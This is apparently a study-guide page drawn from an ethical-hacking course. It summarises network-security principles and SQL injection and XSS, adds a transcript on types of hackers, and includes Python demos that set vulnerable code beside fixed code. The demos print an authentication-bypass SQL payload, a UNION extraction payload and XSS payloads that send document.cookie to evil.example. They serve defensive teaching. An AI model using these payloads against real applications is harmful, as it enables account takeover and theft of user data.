    • Scanning: Nmap is further used for port scanning, and vulnerability scanners like Nessus and Acunetix are employed to identify potential weaknesses.
    • Gaining Access: Metasploit is a key tool in this phase, used to exploit identified vulnerabilities. Tools like SQLmap and password cracking tools like John the Ripper might also be used depending on the identified flaws.
    • Maintaining Access: No tool on the page is dedicated to this phase. What matters is understanding how an operating system lets an attacker persist (the backdoors mentioned in the context of malicious hackers); in a real audit an ethical hacker documents and reports these avenues rather than keeping long-term access.
    • Reporting: While there isn’t a specific tool listed for reporting, the output and findings from all the above tools are crucial for generating a comprehensive security assessment report.

    It’s important to note that the essence of ethical hacking goes beyond simply running automated tools. Ethical hackers need to understand the reports generated by these tools, analyze the findings, and potentially craft their own exploits or use existing ones in a specific manner to bypass security controls. They also need to be aware of security laws and standards to ensure their testing activities are legal and ethical.

    Network Security Core Principles and Key Tools

    Based on the sources, several key principles underpin network security. Network security is a set of technologies and processes aimed at protecting the usability, integrity, and confidentiality of a company’s network infrastructure and the data transmitted and stored within it. It involves preventing unauthorized access, misuse, modification, or destruction of the network and its resources.

    Here are some core network security principles derived from the sources:

    • Confidentiality: Ensuring that sensitive information is protected from unauthorized disclosure. Cryptography, such as encryption of data in transit (HTTPS, and VPNs built on IPsec), plays a vital role in maintaining confidentiality.
    • Integrity: Maintaining the accuracy and completeness of data, preventing unauthorized modification. The Authentication Header (AH) within IPsec provides integrity and origin authentication (ESP can provide them too, in addition to encryption).
    • Availability: Ensuring that authorized users have reliable access to network resources and data when needed. Protecting against denial-of-service (DoS) attacks, which the sources mention in the context of botnets and cyber warfare, is crucial for maintaining availability.
    • Authentication: Verifying the identity of users, devices, or applications trying to access the network. This ensures that only legitimate entities are granted entry.
    • Authorization: Defining and enforcing the level of access granted to authenticated users. This principle ensures that users only have access to the resources necessary for their roles.
    • Layering of Security (Defense in Depth): Implementing multiple security controls at different levels of the network to provide comprehensive protection. If one layer fails, others are in place to offer continued security. The sources discuss physical, technical, and administrative security layers.
    • Physical Security: Protecting physical access to network components like servers and routers.
    • Technical Security: Utilizing hardware and software-based controls such as firewalls, intrusion prevention systems (IPS), and encryption.
    • Administrative Security: Implementing policies, procedures, and user training to govern security-related behavior. Password policies and training staff for network security are examples of administrative controls.
    • Proactive Security: Identifying and mitigating vulnerabilities before they can be exploited by malicious actors. Ethical hacking and penetration testing are proactive approaches to security, where vulnerabilities are intentionally sought out and addressed.
    • Continuous Monitoring and Analysis: Regularly monitoring network traffic and security events to detect and respond to threats. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are tools used for this purpose. Wireshark is a tool that allows for real-time and offline network traffic analysis. Behavioral analytics can also help detect anomalies in network traffic that might indicate an attack.
    • Policy Enforcement: Establishing and consistently enforcing security policies to guide user behavior and system configurations. Ethical hackers may analyze and enhance an organization’s security policies.
    • Risk Assessment: Identifying potential threats and vulnerabilities and evaluating the potential impact they could have on the organization. Ethical hackers often perform risk assessments to prioritize vulnerabilities based on their criticality.
    • Security Awareness and Training: Educating users about security threats and best practices to minimize the risk of human error being exploited. Training staff on what is allowed and not allowed helps secure the organization.

    Key tools that support these principles include:

    • Firewalls: Act as a barrier between trusted and untrusted networks, controlling incoming and outgoing traffic based on defined rules. They can be hardware or software-based.
    • Intrusion Prevention Systems (IPS): Continuously scan networks for malicious activity and take action to block or prevent it.
    • Virtual Private Networks (VPNs): Create encrypted connections over public networks, ensuring secure transmission of sensitive data. VPNs often utilize the IPsec protocol suite.
    • Network Scanners (e.g., Nmap): Used for network discovery, identifying open ports and services, and potential vulnerabilities.
    • Vulnerability Scanners (e.g., Nessus, Acunetix): Automatically identify known security weaknesses in systems and applications.
    • Packet Analyzers (e.g., Wireshark): Capture and analyze network traffic for troubleshooting, security analysis, and understanding communication protocols.

    By adhering to these network security principles and utilizing appropriate tools, organizations can significantly reduce their risk of falling victim to cyber threats and maintain a secure network environment.

    Web Application Vulnerabilities: SQL Injection and XSS

    Based on the sources, web applications are a significant target for security vulnerabilities because they are often accessible over the internet or internal networks and handle sensitive data. The sources highlight several key web application vulnerabilities, their exploitation, and preventative measures.

    1. SQL Injection:

    • Definition: SQL injection is a code injection technique that might exploit security vulnerabilities occurring in the database layer of an application. These vulnerabilities are present when user input is improperly filtered and is inserted into SQL statements. This allows attackers to send malicious SQL code that can be executed by the backend database.
    • Exploitation: Attackers can craft malformed SQL queries by injecting special characters (like single quotes) and SQL operators into input fields such as login forms or URL parameters. By doing so, they can bypass authentication mechanisms, retrieve sensitive data, modify database content, or even execute arbitrary commands on the database server. The demo in the source shows how injecting the string ' or 1=1 -- - into a username field can bypass authentication: the quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the statement, including the password check. Attackers may also try to induce errors to learn the database structure and version, which helps in crafting more effective attacks. Tools like sqlmap automate the process of detecting and exploiting SQL injection vulnerabilities.
    • Types of SQL Injection: The source mentions different types of SQL injection:
    • In-band SQL Injection: The attacker can receive the results of their attack directly through the same communication channel used to inject the code. This includes:
    • Error-based Injection: Exploiting database error messages to gain information about the database structure.
    • Union-based Injection: Using the UNION SQL keyword to combine the results of multiple queries into a single response.
    • Blind SQL Injection: The attacker cannot see the results of their injected queries directly but can infer information based on the application’s response (e.g., different responses for true or false conditions, or time delays). This includes:
    • Boolean-based: Observing different application responses based on true or false conditions in the injected query.
    • Time-based: Injecting queries that cause a time delay in the database response to confirm successful execution.
    • Out-of-band SQL Injection: Less common, this involves the attacker relying on different channels (e.g., email, DNS requests) to receive data from the database server.
    • Prevention: The source outlines several best practices to prevent SQL injection attacks:
    • Use Prepared Statements and Parameterized Queries: These ensure that user-supplied data is treated as data and not as executable code.
    • Object Relational Mapping (ORM): ORM frameworks can help abstract database interactions and reduce the risk of direct SQL injection.
    • Escaping Inputs: Properly sanitizing user input by escaping special characters that have meaning in SQL can prevent them from being interpreted as code. However, the source cautions that not all injection attacks rely on specific characters, and not all languages have equally effective escaping functions.
    • Password Hashing: While not directly preventing SQL injection, properly hashing passwords prevents attackers from easily obtaining plaintext credentials if a database breach occurs.
    • Third-Party Authentication: Utilizing secure third-party authentication mechanisms can reduce the application’s responsibility for handling sensitive credentials.
    • Web Application Firewalls (WAFs): WAFs can be configured to identify and block malicious SQL queries before they reach the application.
    • Secure Coding Practices and Software Updates: Using secure coding practices and keeping software and libraries up to date helps patch known vulnerabilities.
    • Principle of Least Privilege: Database user accounts used by the application should have the minimum necessary privileges.
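    The following is an added example, not code from the course or from sqlmap: the page's own bypass payload and a union-based payload run against a vulnerable login and lookup, beside the parameterized versions that the prevention list recommends. The schema, the two users, the endpoint names and the hashing scheme are all constructed for the demo (SHA-256 is used only to keep it dependency-free; a real application stores passwords with a slow, salted scheme such as argon2 or bcrypt).

```python
"""SQL injection (authentication bypass and UNION extraction) beside the
parameterized fix. Added example for this page; not the course's code."""
import hashlib
import sqlite3

# The page's own bypass payload, plus a UNION payload for the lookup endpoint.
BYPASS_PAYLOAD = "' or 1=1 -- -"
UNION_PAYLOAD = "' UNION SELECT pw_hash, username FROM users -- -"


def hash_password(password: str) -> str:
    """Demo-only hash (unsalted SHA-256). Real code uses argon2/bcrypt; hashing
    is shown because the page lists it as a damage-limiting control."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "pw_hash TEXT, role TEXT)"
    )
    for row in [
        (1, "admin", hash_password("S3cr3t!"), "admin"),
        (2, "alice", hash_password("hunter2"), "user"),
    ]:
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)", row)
    conn.commit()
    return conn


def login_unsafe(conn, username: str, password: str):
    """VULNERABLE: input is spliced into the SQL text, so a quote ends the
    literal and '--' comments out the password check."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND pw_hash = '{hash_password(password)}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """FIXED: parameterized query; the driver passes input as data, never SQL."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND pw_hash = ?",
        (username, hash_password(password)),
    ).fetchone()


def lookup_unsafe(conn, username: str):
    """VULNERABLE profile lookup, the target of the UNION-based payload: the
    attacker appends a second SELECT with the same column count and reads
    whatever columns they like through the lookup's normal response."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username: str):
    """FIXED: the payload is matched as a literal username and finds nothing."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo() -> dict:
    conn = build_db()
    return {
        "bypass_unsafe": login_unsafe(conn, BYPASS_PAYLOAD, "wrong"),
        "bypass_safe": login_safe(conn, BYPASS_PAYLOAD, "wrong"),
        "union_unsafe": lookup_unsafe(conn, UNION_PAYLOAD),
        "union_safe": lookup_safe(conn, UNION_PAYLOAD),
        "legit_safe": login_safe(conn, "alice", "hunter2"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

    The vulnerable login returns the first row of the table (here the admin) for any password, and the vulnerable lookup leaks every password hash, which is why the page pairs parameterized queries with password hashing and least privilege: the fix stops the injection, the other two limit what an injection that slips through can do.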

    2. Cross-Site Scripting (XSS):

    • Definition: Cross-Site Scripting (XSS) attacks involve injecting malicious scripts (most commonly JavaScript) into websites viewed by other users. This happens when a web application does not properly sanitize user input before displaying it to other users.
    • Exploitation: Attackers can inject malicious scripts through various entry points, including:
    • Input fields (e.g., search bars, comment sections, forms)
    • URL parameters
    • Even malicious advertisements
    • Fake emails containing malicious links
    • The injected script then executes in the victim’s browser when they view the compromised page. This can allow the attacker to:
    • Steal session cookies, allowing them to impersonate the victim and gain unauthorized access to their accounts.
    • Capture keystrokes and other sensitive information.
    • Redirect the user to malicious websites.
    • Run other web browser-based exploits.
    • Display fake login forms to steal credentials.
    • The demos in the source illustrate different types of XSS attacks and how they can be executed by injecting JavaScript code into vulnerable web application components.
    • Types of XSS Attacks: The source describes three main types of XSS attacks:
    • Reflected XSS: The malicious script is not permanently stored on the web server. Instead, it is reflected back to the user’s browser as part of the server’s response, often through malicious links or submitted forms. The attack is only effective if the user clicks the malicious link or submits the crafted form.
    • Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database, message board, or comment section). The script is then executed every time a user views the page containing the malicious content, potentially affecting many users. This type is considered riskier due to its persistent nature.
    • DOM-based XSS: The vulnerability exists in the client-side JavaScript code rather than in the server-side code. The attack manipulates the Document Object Model (DOM) in the victim’s browser, causing the client-side script to execute unexpectedly. The malicious payload might be in the URL fragment (after the #) or other client-side data sources.
    • Prevention: The source provides several methods to prevent XSS attacks:
    • Input Validation and Sanitization: Always screen and validate any user input before including it in HTML output or using it in client-side scripts. Sanitize user input by removing or encoding potentially harmful characters. Validation should occur on both the client side and the server side, but only the server-side check is a security control: client-side validation can be bypassed by anyone who sends requests directly (for example through a proxy such as Burp Suite), so it serves usability, not protection.
    • Avoid Displaying Untrusted User Input: If possible, avoid displaying any untrusted user input directly on web pages.
    • Proper Output Encoding/Escaping: When user input must be displayed, properly encode or escape the data based on the context in which it will be rendered (e.g., HTML encoding, JavaScript encoding, URL encoding). Different contexts require different encoding rules, and sometimes multiple layers of encoding are necessary.
    • Content Security Policy (CSP): CSP is an HTTP header that allows website owners to control the sources of content (e.g., scripts, styles, images) that the browser is allowed to load for their website. This can significantly reduce the risk of XSS attacks by preventing the browser from executing malicious scripts from untrusted sources.
    • HttpOnly Cookie Flag: Setting the HttpOnly flag on cookies prevents client-side scripts (like JavaScript) from reading them, which mitigates XSS attacks that aim to steal session cookies. Two caveats: the source notes that this relies on browser support, and the flag does not stop an injected script from acting as the victim inside the page (the browser still attaches the cookie to requests the script makes), so it limits the damage of XSS rather than preventing it.
    • Automated Security Testing: Use automated testing tools to scan web applications for XSS vulnerabilities before release.
    • Regular Security Audits and Updates: Regularly audit code for vulnerabilities and keep all software and libraries updated to patch known security flaws.
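    The following is an added example, not code from the course: the same user input rendered into three output contexts (HTML body, a JavaScript string literal, an href attribute) first without encoding and then with the context-specific encoding, CSP nonce and HttpOnly cookie the prevention list describes. The page template, the attacker inputs, the evil.example hostname, the nonce value and the session id are all constructed for the demo.

```python
"""Context-aware output encoding against XSS, with the vulnerable rendering
beside the fixed one and the CSP / HttpOnly headers. Added example for this
page, not the course's code."""
import html
import json

# Constructed attacker inputs, one per output context.
PAYLOAD_HTML = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'
PAYLOAD_JS = '"; fetch("https://evil.example/?c="+document.cookie); //'
PAYLOAD_URL = "javascript:alert(document.cookie)"


def render_unsafe(comment: str, author: str, link: str) -> str:
    """VULNERABLE: user input lands raw in three contexts (HTML body, a JS
    string literal, an href attribute); each payload breaks out of its own."""
    return (
        f"<p>{comment}</p>\n"
        f'<script>var author = "{author}";</script>\n'
        f'<a href="{link}">profile</a>'
    )


def render_safe(comment: str, author: str, link: str, nonce: str) -> str:
    """FIXED: encode for the context the data is placed in, one rule each."""
    # HTML body: &, <, >, " and ' become entities, so no tag can form.
    safe_comment = html.escape(comment, quote=True)
    # JS string literal: emit a JSON string (quotes and backslashes escaped)
    # and break any "</" so a </script> inside the value cannot end the block
    # (the HTML parser sees </script> before the JS parser ever runs).
    safe_author = json.dumps(author).replace("</", "<\\/")
    # URL attribute: allow-list the scheme first (encoding alone cannot stop
    # javascript:), then attribute-encode.
    if not link.lower().startswith(("http://", "https://")):
        link = "#"
    safe_link = html.escape(link, quote=True)
    return (
        f"<p>{safe_comment}</p>\n"
        f'<script nonce="{nonce}">var author = {safe_author};</script>\n'
        f'<a href="{safe_link}">profile</a>'
    )


def security_headers(session_id: str, nonce: str) -> dict:
    """Defense in depth for whatever the encoding misses.
    CSP: only same-origin scripts and inline scripts carrying this request's
    nonce may run, so an injected <script> without the nonce is refused.
    HttpOnly: document.cookie cannot read the session cookie; Secure and
    SameSite limit where the browser sends it."""
    return {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'"
        ),
        "Set-Cookie": f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/",
    }


def demo() -> dict:
    nonce = "r4nd0m-per-request"  # real code: secrets.token_urlsafe(16) per response
    return {
        "unsafe": render_unsafe(PAYLOAD_HTML, PAYLOAD_JS, PAYLOAD_URL),
        "safe": render_safe(PAYLOAD_HTML, PAYLOAD_JS, PAYLOAD_URL, nonce),
        "headers": security_headers("abc123", nonce),
    }


if __name__ == "__main__":
    out = demo()
    print(out["unsafe"], "\n---\n", out["safe"], "\n---\n", out["headers"])
```

    The point of the three separate rules is the one the page makes about contexts: HTML-escaping the author name would not have saved the JavaScript string, and neither escaping would have stopped a javascript: URL, which only a scheme allow-list catches.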

    Relationship to Security Testing Tools and Principles:

    • Security testing tools like Burp Suite Professional and automated vulnerability scanners like Netsparker and Acunetix are specifically designed to help identify web application vulnerabilities like SQL injection and XSS. Ethical hackers use these tools to probe web applications, identify potential weaknesses in input handling and output rendering, and verify the effectiveness of security controls.
    • The principle of proactive security is directly addressed by identifying and mitigating web application vulnerabilities through testing and secure coding practices.
    • Input validation and sanitization and proper output encoding are crucial aspects of secure coding, aligning with the network security principle of defense in depth by implementing security at the application level.
    • Continuous monitoring can also involve analyzing web application logs for suspicious activity that might indicate an attempted or successful exploitation of a vulnerability.

    Understanding and addressing web application vulnerabilities like SQL injection and XSS is crucial for maintaining the confidentiality, integrity, and availability of web-based services and the data they handle, which are core principles of network security. The OWASP Broken Web Applications project, as mentioned in the source, provides a legal and safe environment to practice identifying and exploiting these vulnerabilities to enhance security skills.

    Ethical Hacking Full Course 2025 | Ethical Hacking Course for Beginners | Simplilearn

    hello everyone and welcome to ethical hacking full course by simply learn in today’s digital world cyber threats are everywhere making cyber security more important than ever this course will teach you the same tools and techniques ethical hackers use to protect networks application and data from cyber attacks with cyber threats increasing the demand for ethical hackers is expected to grow even more by 2025 companies across industries need skilled professionals to secure their systems offering starting salaries around $70,000 in the US and around 6 to 10 LPA in India while experienced hackers can earn over $120,000 plus or 25 lakhs perom in India so in this course you’ll get hands-on experience with ethical hacking learn how to spot vulnerabilities and strengthen security systems so whether you’re new to cyber security or looking to sharpen your skills this course is your pathway to a high demand and well-paying career in ethical hacking but before we commence if you’re interested in stepping one of the most in demand fields in 2025 the advanced executive program in cyber security by simply learn is your perfect opportunity in just 6 months you’ll gain expertise in ethical hacking penetration testing ransomware analysis and advanced defense strategies through a hands-on industry relevant approach this program is offered in collaboration with Triple IT Bangalore and IBM features live interactive classes real world projects and industry recognized certifications so hurry up and enroll now find the course link description box below and in the pin comments data is the new gold imagine how much data is generated by just your smartphone every single day be it the pictures you click or the messages you send nearly 41 million messages are sent worldwide via WhatsApp every single minute so safeguarding your personal data against hackers has now become a top priority did you know that India leads the world when it comes to ethical hackers with 23% of the worldwide 
hacking population from India the top ethical hackers earn more than twice of what software engineers in India do but what makes ethical hacking such a demanding industry ethical hacking is the process of taking security measures to safeguard data and networks from malicious cyber attacks the hackers use every tool at their disposal to try and breach the security barrier and find any potential vulnerabilities the ethical ineth ethical hacking denotes the lack of malicious intent since these sessions are often permitted by the system owner or the network that is being hacked into to fix any compromised entry points before blackhead hackers discover and exploit them so what is a blackhead hacker you may ask a hacker who exploits security vulnerabilities for monetary gains like stealing or destroying private data altering disrupting or shutting down websites and networks is known as a blackhead hacker on the other end of the spectrum we have whitehead hackers who help people secure the networks by stress testing their platform against the most dangerous of cyber attacks that is with their consent of course but the most neutral of the bunch are greyhead hackers who may not ask for consent before snooping on a foreign system but they do inform the owner if they find any vulnerabilities sometimes in exchange for a small fee the security breaches have become less and less prevalent thanks to rigorous ethical hacking campaigns and corporate awareness programs the ability to fix critical security issues before black hat hackers leverage them has saved organizations billions of dollars google IBM Microsoft and virtually every major corporation are looking to protect the data so it shouldn’t come as a surprise that the ethical hacking and information security job market is set to rise by nearly 28% by 2026 with salaries going as high as $225,000 perom so that’s ethical hacking wrapped up in 2 minutes to catch more byite-size and detailed videos on different technologies 
subscribe to Simple Learn and stay updated scammers targeting institutions such as hospitals schools and government offices for ransom pocketed $1.1 billion last year compared with 567 million in 2022 cyber security experts act as a multi-level line of defense against cyber attacks through all internet activity securing individuals corporate giants tech multinational companies international agencies and even governments hence this extremely critical role demands a great pay and the demand for it continues to grow year after year with beginner level salaries averaging around $75,000 with years of experience it can go to above $200,000 for chief information officer level roles due to the extremely critical nature of this job role there is a demand across all verticals including defense healthcare banking tech and even education sector if you want to become a cyber security engineer in 2024 here is how you can jumpstart your career in this field we will split the entire learning path in three major sections beginning with core concepts level topics then we will move on to intermediate skill-based topics and eventually we will discuss what topics to learn in niche cyber security skills let us start with core concept level topics start with getting a thorough introduction to cyber security make sure to learn the basics of cyber security including all the important terminology types of threats how these threats work and what are the working principles in cyber security from there you can move on to mastering networking fundamentals this is an absolute must know to enter the field of cyber security you need to be thorough with how the internet works how the data highway functions right from the function of operating systems to understanding of TCPIP OC model routing and switching every single one of these concepts are critically important make sure to keep these skills handy at all times since they help in understanding the overarching concepts easily but it’s not just 
the networking part of operating systems that you need to know this is where the next important part comes into the picture operating systems proficiency in Windows Linux and possibly Macos operating systems allows you to work across all domains being adept in each of these helps you become better at safeguarding the fault lines across them this is critical for your day-to-day working since you will be directly iterating with these to perform your daily tasks it is not unknown that mathematics and computer science go hand in hand this extends to the field of cyber security too you need to learn cryptography where the knowledge of encryption decryption cryptographic algorithms and protocols is very important next up is risk management understanding risk assessment mitigation strategies and compliance frameworks like GDPR and HIPPA finally you should also understand cyber security laws and ethics awareness of legal and ethical considerations in cyber security let us now move on to two intermediate level skill and toolsbased topics security technologies familiarity with firewalls intrusion detection prevention systems antivirus software and endpoint security vulnerability assessment and penetration testing hands-on experience with tools like Nessus Metas-ploit NMAP and Burp Suite security operations incident response threat hunting log analysis and security information and event management secure coding practices knowledge of secure software development practices and common vulnerabilities like OASP top 10 cloud security understanding of cloud computing security principles and best practices including Oz Azure and Google Cloud Platform mobile security knowledge of mobile application security testing and best practices for securing mobile devices now that you have mastered core concepts and intermediate skills and tools based on your interest you can move on and choose one of the niche fields for learning niche cyber security skills industrial control systems security 
understanding of SCADA systems, PLCs and protocols like Modbus and DNP3.
- IoT security: knowledge of securing Internet of Things devices and protocols.
- Blockchain security: understanding of blockchain technology and its security implications.
- Threat intelligence: gathering, analyzing and leveraging threat intelligence to enhance cyber security posture.
- Reverse engineering: skill in analyzing malware and understanding its behavior.
- Red team / blue team exercises: participating in simulated attacks (red team) and defending against them (blue team).

With that said, we have reached the end of our video. This learning path covers a broad range of topics and skills necessary for a cyber security engineer in 2024, starting from foundational concepts and going on to specialized areas within the field. Make sure to stay updated and keep aligning this learning path to your requirements. If you have any questions about this learning path or cyber security in general, let us know in the comment section below and we would be happy to help.

Let's understand the types of hackers. A hacker is a technically skilled person who is very adept with computers: they have good programming skills, they understand how operating systems work, how networks work, how to identify flaws and vulnerabilities within all of these, and then they know how to misuse those flaws to get an outcome that would be detrimental to the health of the organization. Six types of hackers have been identified: black hat hackers, white hat hackers, grey hat hackers, script kiddies, nation- or state-sponsored hackers and hacktivists.

Black hat hackers are basically the malicious hackers, who have malicious intent and criminal tendencies. They want to harm the organization by hacking into its infrastructure, destroying that infrastructure and destroying its data, so that they can gain
from it from a monetary perspective. These people are also known as crackers. The main aspects of black hats are that they have malicious intent, they carry out unauthorized activities, and they do it for personal gain. Another important point to remember is that a black hat hacker will always try to hide their identity: they will spoof their online digital identity by masking it, spoofing their IP addresses and MAC addresses, and trying to remain anonymous on the network.

A white hat hacker, on the other hand, is an ethical hacker or security analyst: an individual who does exactly what a black hat hacker would do, minus the malicious intent and plus the intent of helping the organization identify its flaws and remedy them so that nobody else can misuse those vulnerabilities. They are authorized to act on the company's behalf; they are authorized to do the activity that helps the company identify those flaws and thus mitigate them, improving its security posture. These security experts or ethical hackers help organizations defend themselves against unauthorized attacks.

Grey hat hackers are a blend of white hat and black hat. They can work both defensively and offensively: they can accept contracts from organizations to increase their security posture, and at the same time they can get themselves involved in malicious, unauthorized activity against other organizations for personal gain or benefit.

Script kiddies are people who are technically not very aware of what hacking is. They rely on existing tools created by other hackers and have no technical knowledge of what they are doing; it is hit or miss for them. They get their hands on a tool and try to execute it: if the hack works, it works, otherwise it doesn't. These are basically noobs or newbies who are trying to learn
hacking, or people with malicious intent who just want to have some fun or impress the people around them.

Then we have the nation- or state-sponsored hackers. As the name suggests, these hackers are sponsored by their government. This may not be a legitimate job, but most governments do have hackers on their payroll to spy on their enemies, to spy on various countries and try to figure out the aspirations of those countries. This is basically a spying activity, where you are technically trying to get access to another country's resources and then spy on them to figure out what their activities have been or what their future plans are.

And then we have the hacktivists: an individual who has a political agenda to promote, and who promotes it by hacking. What is the difference between a black hat hacker and a hacktivist? The black hat hacker will try to hide their identity; the hacktivist will claim responsibility for what they have done. For them it is a political agenda, a political cause, and they will try to hack various organizations to promote that cause, probably by defacing websites and posting the messages they want to promote on them.

So what exactly is ethical hacking? We have discussed the types of hackers; we have identified the malicious hacker as the black hat hacker, with the intent of doing harm to an organization's network for personal gain; and we have discussed what the ethical hacker is. An ethical hacker would be doing the same activity, but in an authorized manner. They would have legal contracts signed with the organization that give them a definite scope of what they are allowed to do and what they are not allowed to do, and the ethical hackers would function within that scope. They would try to execute test scenarios where they would be able to identify those flaws or those system
vulnerabilities, and then they would submit a report to the management of what they have found. They would also help the management mitigate or resolve those weaknesses so that nobody else can misuse them later on. They might use the same techniques and the same tools that black hat hackers do; however, the main difference is that they are authorized to do that particular activity, they are doing it in a controlled manner, and they are doing it with the intent of helping the organization and not for personal gain.

So who is an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work and how operating systems work. They can troubleshoot; they are technically very adept at computing; they understand the architecture and how the various components in a computer work, and they can troubleshoot those components. They can also be very good with programming. Now, when I say programming, we don't need the ethical hacker to be a good developer of applications; we want them to understand programming well enough to create scripts and write their own short programs, like viruses, worms, trojans or exploits, which would help them achieve the objective they have set out for.

So, as you can see, ethical hackers are individuals who perform a security assessment of their companies with the permission of the concerned authorities. What is a security assessment? A security assessment finds out the exact security posture of the organization by identifying what security controls are in place, how they have been configured, and whether there are any gaps in the configurations themselves. An organization will hire an ethical hacker and give them information about what security controls, what firewalls, what IDS/IPS (intrusion detection or intrusion prevention systems) and what antiviruses are already in place,
and then they will ask the ethical hacker to figure out a way to bypass these mechanisms and see if they can still hack the organization.

What is the need for an ethical hacker? The need for an ethical hacker is proactive security. The ethical hacker would identify all the existing flaws in an organization and try to resolve them, to help secure the organization from black hat hackers. Ethical hackers prevent hackers from cracking into an organization's network by securing the organization and improving its security on a periodic basis. They also try to identify system vulnerabilities, network vulnerabilities or application-level vulnerabilities that have been missed, and then figure out a way of plugging or resolving them so that they cannot be misused by other hackers. They would also analyze and enhance the organization's security policies.

Now, what are policies? Policies are basically documents created by an organization, of rules that all the employees need to follow to ensure that the security of the organization is maintained. For example, a password policy helps users in an organization adhere to the standards the organization has set for password complexity: when a user creates a password, it should adhere to standards where random words are used, where the password contains the alphabet A through Z in uppercase and lowercase, the numerals 0 through 9 and special characters, and where it is randomized, so that the password becomes stronger and resists brute-force attacks. What would an ethical hacker do at this point in time? They would try to test the strength of the passwords, to see if brute-force attacks or dictionary attacks are possible and whether any of those passwords can be cracked. They would ensure that all the employees are following the policies and that all the passwords are as secure as the policies want them to be. If
there are any gaps in the policies or in the implementation of the policy, it is the ethical hacker's responsibility to identify those gaps and warn the organization about them. Similarly, they would also try to protect any personal information, any data that is owned by the organization and that is critical to its functioning, from falling into a hacker's hands.

Now, what are the skills required of an ethical hacker? First and foremost, they should have good knowledge of operating systems such as Windows, Linux, Unix and Mac. When we say knowledge of operating systems, it is not only about how to use them but how to troubleshoot them, how they work, how they need to be configured and how they can be secured. Securing an operating system, for example, is not only installing a firewall and an antivirus; you need to configure permissions on the operating system for what users are allowed to do and what they are not allowed to do, for example limiting the installation of applications. How are we going to do that? We go into the Security Center of Windows and configure the security parameters there for what software is acceptable and what is not; the same goes for Linux and Mac operating systems. So we need to know how to secure these operating systems. All of these also come in desktop and server versions, and as an ethical hacker we need to know both: how to configure them and how to provide services on these servers within the organization so that they can be consumed in a secure manner by all the employees.

At the same time, they should be knowledgeable in programming or scripting languages such as PHP, Python, Ruby and HTML (for programming, if you will), because web servers come into the picture.
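The password policy described above, turned into a check a security analyst could run over a set of passwords, as an added example: this is not the speaker's code, and the minimum length, the special-character set, the common-password list and the sample passwords are constructed assumptions for illustration. Beyond what the talk states, the second function estimates the search space a brute-force attacker faces, counting only the character classes actually present in a password, which shows in numbers why the policy asks for all of them.

```python
import math

# Constructed policy, modelled on the password policy described above: uppercase,
# lowercase, digits and special characters, randomised rather than a dictionary word.
# MIN_LENGTH, SPECIALS and COMMON_PASSWORDS are assumptions for illustration.
MIN_LENGTH = 12
SPECIALS = set("!@#$%^&*()-_=+[]{};:,.<>?/")
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome"}


def check_policy(password):
    """Return the list of policy rules the password violates (empty list = compliant)."""
    failures = []
    if len(password) < MIN_LENGTH:
        failures.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isupper() for c in password):
        failures.append("no uppercase letter")
    if not any(c.islower() for c in password):
        failures.append("no lowercase letter")
    if not any(c.isdigit() for c in password):
        failures.append("no digit")
    if not any(c in SPECIALS for c in password):
        failures.append("no special character")
    if password.lower() in COMMON_PASSWORDS:
        failures.append("found in the common-password list (dictionary attack)")
    return failures


def brute_force_bits(password):
    """log2 of the key space a brute-force attacker must search for this password.

    Only the character classes actually present count: a lowercase-only password
    of length n lives in a space of 26**n, not 88**n, however the policy reads.
    """
    alphabet = 0
    if any(c.islower() for c in password):
        alphabet += 26
    if any(c.isupper() for c in password):
        alphabet += 26
    if any(c.isdigit() for c in password):
        alphabet += 10
    if any(c in SPECIALS for c in password):
        alphabet += len(SPECIALS)
    return len(password) * math.log2(alphabet) if alphabet else 0.0


def audit(passwords):
    """Audit passwords against the policy: {password: (failures, search-space bits)}."""
    return {p: (check_policy(p), round(brute_force_bits(p), 1)) for p in passwords}


if __name__ == "__main__":
    # Constructed sample passwords for the demonstration.
    for pw, (failures, bits) in audit(["password", "Summer2024", "T7#kq!Lm9$vZ"]).items():
        verdict = "compliant" if not failures else "; ".join(failures)
        print(f"{pw!r}: {verdict} (brute-force space about 2^{bits})")
```

Run against a password dump from a test environment, the audit separates policy violations (which the organization fixes by enforcing the policy) from passwords that are compliant but still in a small search space, which is the case the talk's brute-force and dictionary testing is meant to catch.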
They should not be great developers who can create huge applications, but they should be able to develop scripts, understand and analyze scripts, and figure out what the output of those scripts should be to achieve the hacking goals they have set out for.

An ethical hacker should have a very good understanding of networking. No matter whether you are in application security, network security or host-based security, since a computer will always be connected to a network, either a local area network (LAN) or the internet, we should know how networking works: the seven layers of the OSI model, which protocols work at each of those layers, the TCP/IP model and how the OSI model maps onto it, how TCP and UDP work, and how each protocol is crafted and is supposed to behave, so that we can analyze and understand any network-based attack.

We should be very good in security measures: we should know where vulnerabilities would lie and what the latest exploits available in the market are, we should be able to identify them, and we should know the techniques and tools for dealing with security, analyzing it and then implementing it to enhance it.

Along with that, it is important that a security analyst or ethical hacker is aware of the local security laws and standards. Why? Because an organization cannot do any illegal activity: whatever responses they have, whatever security mechanisms and security controls they implement, these need to adhere to the law of the land, they should be legal in nature, and they should not cause undue harm to any of the employees or any of the third-party clients they deal with. So ethical hackers should be aware of the security laws before they implement security controls, or even before they start testing for security
